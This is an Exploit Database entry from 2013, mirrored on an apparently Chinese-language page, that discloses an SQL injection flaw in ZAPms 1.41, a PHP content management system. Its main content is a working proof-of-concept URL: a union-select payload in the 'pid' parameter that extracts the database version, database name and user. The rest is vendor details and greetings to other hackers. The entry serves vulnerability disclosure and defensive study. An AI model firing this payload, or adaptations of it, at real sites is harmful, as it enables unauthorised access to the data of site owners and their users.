ZAPms 1.41 – SQL Injection

• Exploit Database
• 12 阅读

• 作者： NoGe
  日期： 2013-04-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24942/

• =============================================================================================================
  
  
  [o] ZAPms <= SQL Injection Vulnerability
  
   Software : ZAPms
   Version: 1.41
   Vendor : http://www.zapms.de
   Author : NoGe
   Contact: noge[dot]code[at]gmail[dot]com
   Desc : ZAPms is free open source web content management system,
  adapted to the needs of businesses on the Internet.
  The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.
  
  
  =============================================================================================================
  
  
  [o] Exploit
  
   http://localhost/[path]/products?pid=[SQLi]
  
  
  =============================================================================================================
  
  
  [o] PoC
  
   http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
  
  
  =============================================================================================================
  
  
  [o] Greetz
  
   Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
   aJe kaka11 matthews wishnusakti inc0mp13te martfella
   pizzyroot Genex H312Y noname tukulesto }^-^{
  
  
  =============================================================================================================
  
  
  [o] April 09 2013 - Papua, Indonesia